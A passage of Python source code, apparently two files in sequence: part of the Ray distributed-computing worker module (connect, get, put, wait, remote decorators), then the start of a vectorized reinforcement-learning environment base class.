logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = ray.gcs_utils.ErrorTableData.FromString(
pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@client_mode_hook
def is_initialized():
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Limit the amount of memory the driver can
use in the object store when creating objects.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE,
UTIL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
# TODO(qwang): Rename this to `worker_id_str` or type to `WorkerID`
worker.worker_id = _random_string()
else:
# This is the code path of driver mode.
if job_id is None:
# TODO(qwang): use `GcsClient::GenerateJobId()` here.
job_id = JobID.from_int(
int(worker.redis_client.incr("JobCounter")))
# When tasks are executed on remote workers in the context of multiple
# drivers, the current job ID is used to keep track of which job is
# responsible for the task so that error messages will be propagated to
# the correct driver.
worker.worker_id = ray._private.utils.compute_driver_id_from_job(
job_id).binary()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
if mode == SCRIPT_MODE:
import __main__ as main
driver_name = (main.__file__
if hasattr(main, "__file__") else "INTERACTIVE MODE")
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash)
worker.gcs_client = worker.core_worker.get_gcs_client()
# Create an object for interfacing with the global state.
# Note, global state should be intialized after `CoreWorker`, because it
# will use glog, which is intialized in `CoreWorker`.
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environmen will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
runtime_env.upload_runtime_env_package_if_needed(job_config)
elif mode == WORKER_MODE:
# TODO(ekl) get rid of the env var hack and get runtime env from the
# task spec and/or job config only.
uris = os.environ.get("RAY_RUNTIME_ENV_FILES")
uris = [uris] if uris else \
worker.core_worker.get_job_config().runtime_env.uris
working_dir = runtime_env.ensure_runtime_env_setup(uris)
if working_dir is not None:
os.chdir(working_dir)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
worker.core_worker.set_object_store_client_options(
f"ray_driver_{os.getpid()}", driver_object_store_memory)
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE, UTIL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# In client mode, if we use runtime env, then it'll be taken care of
# automatically.
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
def show_in_dashboard(message, key="", dtype="text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@client_mode_hook
def get(object_refs, *, timeout=None):
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
None, None, False, None,
debugger_breakpoint.decode() if debugger_breakpoint else None)
rdb.set_trace(frame=frame)
return values
@client_mode_hook
def put(value):
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(value)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@client_mode_hook
def wait(object_refs, *, num_returns=1, timeout=None, fetch_local=True):
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@client_mode_hook
def get_actor(name):
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
worker = global_worker
worker.check_connected()
handle = worker.core_worker.get_named_actor_handle(name)
return handle
@client_mode_hook
def kill(actor, *, no_restart=True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@client_mode_hook
def cancel(object_ref, *, force=False, recursive=True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
worker=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See``runtime_env.py`` for
detailed documentation. Note: can only be set via `.options()`.
override_environment_variables (Dict[str, str]): This specifies
environment variables to override for the actor or task. The
overrides are propagated to all child actors and tasks. This
is a dictionary mapping variable names to their values. Existing
variables can be overridden, new ones can be created, and an
existing variable can be unset by setting it to an empty string.
Note: can only be set via `.options()`.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
"the arguments 'num_returns', 'num_cpus', 'num_gpus', "
"'memory', 'object_store_memory', 'resources', "
"'max_calls', or 'max_restarts', like "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
], error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
worker=worker)
|
vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import numpy as np
import inspect
import warnings
from abc import ABC, abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Sequence, Tuple, Type, Union
import cloudpickle
# Define type aliases here to avoid circular import
# Used when we want to access one or more VecEnv
VecEnvIndices = Union[None, int, Iterable[int]]
# VecEnvObs is what is returned by the reset() method
# it contains the observation for each env
VecEnvObs = Union[np.ndarray, Dict[str, np.ndarray], Tuple[np.ndarray, ...]]
# VecEnvStepReturn is what is returned by the step() method
# it contains the observation, reward, done, info for each env
VecEnvStepReturn = Tuple[VecEnvObs, np.ndarray, np.ndarray, List[Dict]]
class RunningMeanStd(object):
"""Calulates the running mean and std of a data stream.
https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
"""
def __init__(
self, mean: Union[float, np.ndarray] = 0.0, std: Union[float, np.ndarray] = 1.0
) -> None:
self.mean, self.var = mean, std
self.count = 0
def update(self, x: np.ndarray) -> None:
"""Add a batch of item into RMS with the same shape, modify mean/var/count."""
batch_mean, batch_var = np.mean(x, axis=0), np.var(x, axis=0)
batch_count = len(x)
delta = batch_mean - self.mean
total_count = self.count + batch_count
new_mean = self.mean + delta * batch_count / total_count
m_a = self.var * self.count
m_b = batch_var * batch_count
m_2 = m_a + m_b + delta ** 2 * self.count * batch_count / total_count
new_var = m_2 / total_count
self.mean, self.var = new_mean, new_var
self.count = total_count
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
:param num_envs: the number of environments
:param observation_space: the observation space
:param action_space: the action space
:param norm_obs: Normalize the observation space
"""
def __init__(self, num_envs: int, observation_space, action_space, norm_obs=False):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
self.norm_obs = norm_obs
if norm_obs:
self.obs_rms = RunningMeanStd()
self.__eps = np.finfo(np.float32).eps.item()
@abstractmethod
def reset(self) -> VecEnvObs:
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
:return: observation
"""
raise NotImplementedError()
@abstractmethod
def step_async(self, actions: np.ndarray) -> None:
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
raise NotImplementedError()
@abstractmethod
def step_wait(self) -> VecEnvStepReturn:
"""
Wait for the step taken with step_async().
:return: observation, reward, done, information
"""
raise NotImplementedError()
@abstractmethod
def close(self) -> None:
"""
Clean up the environment's resources.
"""
raise NotImplementedError()
@abstractmethod
def get_attr(self, attr_name: str, indices: VecEnvIndices = None) -> List[Any]:
"""
Return attribute from vectorized environment.
:param attr_name: The name of the attribute whose value to return
:param indices: Indices of envs to get attribute from
:return: List of values of 'attr_name' in all environments
"""
raise NotImplementedError()
@abstractmethod
def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:
"""
Set attribute inside vectorized environments.
:param attr_name: The name of attribute to assign new value
:param value: Value to assign to `attr_name`
:param indices: Indices of envs to assign value
:return:
"""
raise NotImplementedError()
@abstractmethod
def env_method(self, method_name: str, *method_args, indices: VecEnvIndices = None, **method_kwargs) -> List[Any]:
"""
Call instance methods of vectorized environments.
:param method_name: The name of the environment method to invoke.
:param indices: Indices of envs whose method to call
:param method_args: Any positional arguments to provide in the call
:param method_kwargs: Any keyword arguments to provide in the call
:return: List of items returned by the environment's method call
"""
raise NotImplementedError()
@abstractmethod
def env_is_wrapped(self, wrapper_class: 'Type[gym.Wrapper]', indices: VecEnvIndices = None) -> List[bool]:
"""
Check if environments are wrapped with a given wrapper.
:param method_name: The name of the environment method to invoke.
:param indices: Indices of envs whose method to call
:param method_args: Any positional arguments to provide in the call
:param method_kwargs: Any keyword arguments to provide in the call
:return: True if the env is wrapped, False otherwise, for each env queried.
"""
raise NotImplementedError()
def step(self, actions: np.ndarray) -> VecEnvStepReturn:
"""
Step the environments with the given action
:param actions: the action
:return: observation, reward, done, information
"""
self.step_async(actions)
return self.step_wait()
def get_images(self) -> Sequence[np.ndarray]:
"""
Return RGB images from each environment
"""
raise NotImplementedError
def render(self, mode: str = "human") -> Optional[np.ndarray]:
"""
Gym environment rendering
:param mode: the rendering type
"""
raise NotImplementedError
@abstractmethod
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
"""
Sets the random seeds for all environments, based on a given seed.
Each individual environment will still get its own seed, by incrementing the given seed.
:param seed: The random seed. May be None for completely random seeding.
:return: Returns a list containing the seeds for each individual env.
Note that all list elements may be None, if the env does not return anything when being seeded.
"""
pass
@property
def unwrapped(self) -> "VecEnv":
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def getattr_depth_check(self, name: str, already_found: bool) -> Optional[str]:
"""Check if an attribute reference is being hidden in a recursive call to __getattr__
:param name: name of attribute to check for
:param already_found: whether this attribute has already been found in a wrapper
:return: name of module whose attribute is being shadowed, if any.
"""
if hasattr(self, name) and already_found:
return f"{type(self).__module__}.{type(self).__name__}"
else:
return None
def _get_indices(self, indices: VecEnvIndices) -> Iterable[int]:
"""
Convert a flexibly-typed reference to environment indices to an implied list of indices.
:param indices: refers to indices of envs.
:return: the implied list of indices.
"""
if indices is None:
indices = range(self.num_envs)
elif isinstance(indices, int):
indices = [indices]
return indices
def normalize_obs(self, obs: np.ndarray) -> np.ndarray:
"""Normalize observations by statistics in obs_rms."""
if self.norm_obs:
clip_max = 10.0 # this magic number is from openai baselines
# see baselines/common/vec_env/vec_normalize.py#L10
obs = (obs - self.obs_rms.mean) / np.sqrt(self.obs_rms.var + self.__eps)
obs = np.clip(obs, -clip_max, clip_max)
return obs
class VecEnvWrapper(VecEnv):
"""
Vectorized environment base class
:param venv: the vectorized environment to wrap
:param observation_space: the observation space (can be None to load from venv)
:param action_space: the action space (can be None to load from venv)
"""
def __init__(
self,
venv: VecEnv,
